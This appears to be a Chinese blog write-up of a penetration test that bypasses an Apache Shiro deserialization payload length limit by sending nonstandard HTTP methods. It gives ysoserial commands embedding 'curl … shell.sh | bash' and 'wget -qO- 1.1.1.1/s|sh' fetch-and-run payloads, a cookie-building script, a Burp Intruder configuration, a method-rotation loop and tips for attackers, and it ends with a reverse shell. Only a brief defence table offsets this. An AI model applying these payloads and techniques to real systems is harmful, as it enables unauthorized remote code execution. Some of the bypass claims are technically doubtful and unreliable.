当前位置：首页 > article >正文

实战复盘：我是如何绕过那个烦人的Shiro反序列化长度限制拿到Shell的

article 2026/4/19 11:32:29

突破Shiro反序列化长度限制的实战手记那天凌晨三点咖啡杯已经见底我盯着屏幕上那个熟悉的Shiro登录界面手指在键盘上无意识地敲击着。这已经是本周遇到的第三个使用Shiro框架的系统了前两个都轻松拿下但这个系统却让我栽了跟头——不是因为没有漏洞而是因为那个该死的反序列化长度限制。1. 初遇Shiro反序列化漏洞事情要从一周前说起。在对某企业系统进行授权渗透测试时Burp的被动扫描突然弹出一个提示检测到Apache Shiro框架。作为Java安全审计的老手我立刻来了精神——Shiro反序列化漏洞可是渗透测试中的低垂果实。我迅速启动了常用的Shiro反序列化利用工具填入目标URL和默认密钥点击执行...然后收获了一个令人困惑的错误HTTP/1.1 400 Bad Request Content-Length: 0 Connection: close可能是工具问题我心想。于是换上了业内知名的飞鸿哥Shiro攻击套件结果同样碰壁[ERROR] Payload delivery failed: Server rejected request with 400 status这时我才意识到遇到的不是普通的Shiro漏洞而是一个经过特殊加固的系统。2. 长度限制的发现与分析手工测试阶段我决定从基础入手逐步构建payload。使用ysoserial生成CommonsBeanutils1链java -jar ysoserial.jar CommonsBeanutils1 curl http://myvps/shell.sh | bash payload.bin然后将其Base64编码构造rememberMe cookieimport base64 with open(payload.bin, rb) as f: payload base64.b64encode(f.read()).decode(utf-8) print(frememberMe{payload})当我把这个cookie通过Burp Repeater发送时再次收到400错误。经过多次尝试发现一个关键现象当payload长度≤2100字符时请求正常处理超过这个长度立即返回400错误这明显是某种长度限制机制在起作用。通过对比多个Shiro版本文档和调试日志我确认这是开发人员有意设置的防御措施——不是WAF而是应用层实现的payload长度检查。3. 突破限制的探索之路面对这种限制我尝试了多种绕过方法方法一压缩payloadjava -jar ysoserial.jar CommonsBeanutils1 ... | gzip | base64→ 仍然超过长度限制方法二使用更短的命令wget -qO- http://myvps/shell.sh|bash→ 还是太长方法三分块传输编码POST /login HTTP/1.1 Transfer-Encoding: chunked ...→ 被服务器拒绝正当我准备放弃时一个偶然的发现改变了局面。在测试各种HTTP方法时我故意发送了一个不存在的HTTP方法FOO /login HTTP/1.1 Cookie: rememberMe...服务器返回了501未实现但关键的是——响应中出现了Shiro的rememberMe处理痕迹这说明非常规HTTP方法绕过了长度检查Shiro仍然处理了rememberMe cookie反序列化漏洞依然可利用4. 完整利用链构建基于这个发现我设计了完整的绕过方案生成精简payloadjava -jar ysoserial.jar CommonsBeanutils1 wget -qO- 1.1.1.1/s|sh | gzip | base64 -w0构造特殊HTTP请求CUSTOM /login HTTP/1.1 Host: target.com Cookie: rememberMe...使用Burp Intruder自动化攻击类型Pitchfork Payload set 1非常规HTTP方法列表FOO,BAR,XYZ等 Payload set 2不同长度的rememberMe payload成功响应特征HTTP/1.1 500 Internal Server Error Set-Cookie: rememberMedeleteMe; ...当看到这个响应时我知道反序列化已经触发立即检查服务器日志确认命令执行tail -f /var/log/apache2/access.log 1.1.1.1 - - [GET /s HTTP/1.1] 2005. 防御措施与对抗思路针对这种绕过技术防御方可以考虑以下措施防御措施实施方法有效性更新Shiro版本升级到1.7.0★★★★☆自定义密钥替换默认AES密钥★★★★★请求方法过滤只允许GET/POST等标准方法★★★☆☆多层长度检查在Servlet前添加过滤器★★★★☆而对于攻击方我的实战建议是保持payload精简优先使用wget/curl等短命令考虑分段执行先下载后执行方法轮询技巧methods [FOO,BAR,XYZ,TEST,CUSTOM] for method in methods: send_request(method, payload)自动化工具改造修改现有Shiro利用工具增加非常规HTTP方法支持payload长度优化自动检测响应特征凌晨五点当第一个反向shell连接建立时我长舒一口气。这次经历再次证明在安全攻防的世界里没有绝对的安全只有持续的对抗。那些看似坚固的防御往往只需要换一个角度思考就能找到突破口。

实战复盘：我是如何绕过那个烦人的Shiro反序列化长度限制拿到Shell的

相关文章：

实战复盘：我是如何绕过那个烦人的Shiro反序列化长度限制拿到Shell的

如何在Windows上完美使用PS4手柄：DS4Windows终极配置指南

LOSEHU固件终极指南：解锁泉盛UV-K5/K6对讲机全部潜能

给程序员的真心话：读研三年 vs 本科直接进大厂，我用亲身经历帮你算笔账

APK Installer完整指南：在Windows上轻松安装Android应用

pyannote.audio说话人日志实战：从零到生产级部署的完整指南

LabView条件结构避坑指南：布尔型、字符串、数值型输入的常见错误与解决方法

SAP资产批量导入实战：手把手教你用BAPI_FIXEDASSET_OVRTAKE_CREATE搞定历史资产与当年折旧

告别“充不上电”：手把手教你用万用表排查直流快充桩常见故障（附检测点电压实测）

从Arduino到STM32：手把手教你将GRBL固件移植到STM32F446RE开发板（附引脚配置详解）

Pixel Mind Decoder 辅助代码审查：识别开发者提交情绪与代码质量关联

OmenSuperHub终极指南：解锁惠普OMEN游戏本全部性能的完整教程

BERT中文文本分割镜像部署教程：Docker Compose编排多模型协同服务

Photoshop-Export-Layers-to-Files-Fast：告别繁琐图层导出的终极解决方案 [特殊字符]

Windows 11 LTSC微软商店安装终极指南：3步恢复完整应用生态

自制车模的福音：微型车模设计方案厂家开源了

忍者像素绘卷部署案例：高校AI实验室构建面向本科生的像素艺术实践平台

如何轻松编辑暗黑破坏神2存档：d2s-editor可视化编辑器完整指南

The Verge员工推荐：50美元以下实用小工具，改善生活超划算！

Qwen2.5-7B-Instruct效果展示：复杂嵌套JSON Schema生成+字段类型校验

rtrvr.ai AI 子程序：零 token 成本自动化脚本，解决网络智能体认证难题！

三步完成BilldDesk私有化部署：打造专属远程桌面控制平台

告别虚拟机！在Win11上用WSL2+Ubuntu22.04搭建RK3568开发环境（保姆级避坑指南）

League Akari助手：革新英雄联盟游戏体验的终极智能工具箱

PyTorch 2.8镜像实战案例：RTX 4090D运行MiniCPM-Llama3-8B多语言问答

新手避坑指南：在Ubuntu 20.04上搞定衫川Delta 2A激光雷达的ROS驱动与Rviz可视化

5个超实用技巧：用Snap Hutao工具箱让你的原神游戏体验提升300%

别再手动点点点了！用MeterSphere一站式搞定接口、性能与测试管理（附Docker部署避坑指南）

Windows平台Android应用安装神器：APK-Installer全面解析与实战指南

从AMP到BMP：在ZYNQ上玩转多核任务绑定的三种模式对比与选型指南